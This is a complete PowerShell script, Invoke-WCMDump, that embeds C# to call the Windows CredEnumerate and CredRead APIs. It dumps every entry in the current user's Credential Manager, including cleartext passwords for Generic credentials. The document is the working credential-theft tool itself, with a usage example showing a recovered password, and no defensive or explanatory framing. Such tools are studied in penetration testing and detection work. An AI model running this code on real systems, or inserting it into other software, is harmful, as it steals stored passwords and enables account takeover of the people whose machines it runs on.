function Invoke-WCMDump{ <# .SYNOPSIS Dumps Windows cr

1. function Invoke-WCMDump
2. {
3. <#
4. .SYNOPSIS
5. Dumps Windows credentials from the Windows Credential Manager for the current user.
6. Author: Barrett Adams (@peewpw)
7. .DESCRIPTION
8. Enumerates Windows credentials in the Credential Manager and then extracts available
9. information about each one. Passwords can be retrieved for "Generic" type credentials,
10. but not for "Domain" type credentials.
11. .EXAMPLE
12. PS>Import-Module .\Invoke-WCMDump.ps1
13. PS>Invoke-WCMDump
14. Username : testusername
15. Password : P@ssw0rd!
16. Target : TestApplication
17. Description :
18. LastWriteTime : 12/9/2017 4:46:50 PM
19. LastWriteTimeUtc : 12/9/2017 9:46:50 PM
20. Type : Generic
21. PersistenceType : Enterprise
22. #>
23.  
24.  
25. $source = @"
26. // C# modified from https://github.com/spolnik/Simple.CredentialsManager
27.  
28. using Microsoft.Win32.SafeHandles;
29. using System;
30. using System.Collections.Generic;
31. using System.Linq;
32. using System.Runtime.InteropServices;
33. using System.Security.Permissions;
34.  
35. public class Credential : IDisposable
36. {
37. private static readonly object LockObject = new object();
38. private static readonly SecurityPermission UnmanagedCodePermission;
39. private string description;
40. private DateTime lastWriteTime;
41. private string password;
42. private PersistenceType persistenceType;
43. private string target;
44. private CredentialType type;
45. private string username;
46. static Credential()
47. {
48. lock (LockObject)
49. {
50. UnmanagedCodePermission = new SecurityPermission(SecurityPermissionFlag.UnmanagedCode);
51. }
52. }
53.  
54. public Credential(string username, string password, string target, CredentialType type)
55. {
56. Username = username;
57. Password = password;
58. Target = target;
59. Type = type;
60. PersistenceType = PersistenceType.Session;
61. lastWriteTime = DateTime.MinValue;
62. }
63.  
64. public string Username
65. {
66. get { return username; }
67. set { username = value; }
68. }
69.  
70. public string Password
71. {
72. get { return password; }
73. set { password = value; }
74. }
75.  
76. public string Target
77. {
78. get { return target; }
79. set { target = value; }
80. }
81.  
82. public string Description
83. {
84. get { return description; }
85. set { description = value; }
86. }
87.  
88. public DateTime LastWriteTime
89. {
90. get { return LastWriteTimeUtc.ToLocalTime(); }
91. }
92.  
93. public DateTime LastWriteTimeUtc
94. {
95. get { return lastWriteTime; }
96. private set { lastWriteTime = value; }
97. }
98.  
99. public CredentialType Type
100. {
101. get { return type; }
102. set { type = value; }
103. }
104.  
105. public PersistenceType PersistenceType
106. {
107. get { return persistenceType; }
108. set { persistenceType = value; }
109. }
110.  
111. public void Dispose() { }
112.  
113. public bool Load()
114. {
115. UnmanagedCodePermission.Demand();
116.  
117. IntPtr credPointer;
118.  
119. var result = NativeMethods.CredRead(Target, Type, 0, out credPointer);
120. if (!result)
121. return false;
122.  
123. using (var credentialHandle = new NativeMethods.CriticalCredentialHandle(credPointer))
124. {
125. LoadInternal(credentialHandle.GetCredential());
126. }
127.  
128. return true;
129. }
130.  
131. public static IEnumerable<Credential> LoadAll()
132. {
133. UnmanagedCodePermission.Demand();
134.  
135. return NativeMethods.CredEnumerate()
136. .Select(c => new Credential(c.UserName, null, c.TargetName, (CredentialType)c.Type))
137. .Where(c => c.Load());
138. }
139.  
140. internal void LoadInternal(NativeMethods.CREDENTIAL credential)
141. {
142. Username = credential.UserName;
143.  
144. if (credential.CredentialBlobSize > 0)
145. {
146. Password = Marshal.PtrToStringUni(credential.CredentialBlob, credential.CredentialBlobSize / 2);
147. }
148.  
149. Target = credential.TargetName;
150. Type = (CredentialType)credential.Type;
151. PersistenceType = (PersistenceType)credential.Persist;
152. Description = credential.Comment;
153. LastWriteTimeUtc = DateTime.FromFileTimeUtc(credential.LastWritten);
154. }
155. }
156.  
157. public class NativeMethods
158. {
159. [DllImport("Advapi32.dll", EntryPoint = "CredReadW", CharSet = CharSet.Unicode, SetLastError = true)]
160. internal static extern bool CredRead(string target, CredentialType type, int reservedFlag, out IntPtr credentialPtr);
161.  
162. [DllImport("Advapi32.dll", EntryPoint = "CredFree", SetLastError = true)]
163. internal static extern void CredFree([In] IntPtr cred);
164.  
165. [DllImport("Advapi32.dll", EntryPoint = "CredEnumerate", SetLastError = true, CharSet = CharSet.Unicode)]
166. public static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials);
167.  
168. [StructLayout(LayoutKind.Sequential)]
169. internal struct CREDENTIAL
170. {
171. public int Flags;
172. public int Type;
173. [MarshalAs(UnmanagedType.LPWStr)] public string TargetName;
174. [MarshalAs(UnmanagedType.LPWStr)] public string Comment;
175. public long LastWritten;
176. public int CredentialBlobSize;
177. public IntPtr CredentialBlob;
178. public int Persist;
179. public int AttributeCount;
180. public IntPtr Attributes;
181. [MarshalAs(UnmanagedType.LPWStr)] public string TargetAlias;
182. [MarshalAs(UnmanagedType.LPWStr)] public string UserName;
183. }
184.  
185. internal static IEnumerable<CREDENTIAL> CredEnumerate()
186. {
187. int count;
188. IntPtr pCredentials;
189. var ret = CredEnumerate(null, 0, out count, out pCredentials);
190.  
191. if (ret == false)
192. throw new Exception("Failed to enumerate credentials");
193.  
194. var credentials = new IntPtr[count];
195. for (var n = 0; n < count; n++)
196. credentials[n] = Marshal.ReadIntPtr(pCredentials, n * Marshal.SizeOf(typeof(IntPtr)));
197.  
198. return credentials.Select(ptr => (CREDENTIAL)Marshal.PtrToStructure(ptr, typeof(CREDENTIAL)));
199. }
200.  
201. internal sealed class CriticalCredentialHandle : CriticalHandleZeroOrMinusOneIsInvalid
202. {
203. internal CriticalCredentialHandle(IntPtr preexistingHandle)
204. {
205. SetHandle(preexistingHandle);
206. }
207.  
208. internal CREDENTIAL GetCredential()
209. {
210. if (!IsInvalid)
211. {
212. return (CREDENTIAL)Marshal.PtrToStructure(handle, typeof(CREDENTIAL));
213. }
214.  
215. throw new InvalidOperationException("Invalid CriticalHandle!");
216. }
217.  
218. protected override bool ReleaseHandle()
219. {
220. if (!IsInvalid)
221. {
222. CredFree(handle);
223. SetHandleAsInvalid();
224. return true;
225. }
226. return false;
227. }
228. }
229. }
230.  
231. public enum CredentialType : uint
232. {
233. None = 0,
234. Generic = 1,
235. DomainPassword = 2,
236. DomainCertificate = 3,
237. DomainVisiblePassword = 4,
238. GenericCertificate = 5,
239. DomainExtended = 6,
240. Maximum = 7,
241. CredTypeMaximum = Maximum+1000
242. }
243.  
244. public enum PersistenceType : uint
245. {
246. Session = 1,
247. LocalComputer = 2,
248. Enterprise = 3
249. }
250. "@
251. $add = Add-Type -TypeDefinition $source -Language CSharp -PassThru
252. $loadAll = [Credential]::LoadAll()
253. Write-Output $loadAll
254. }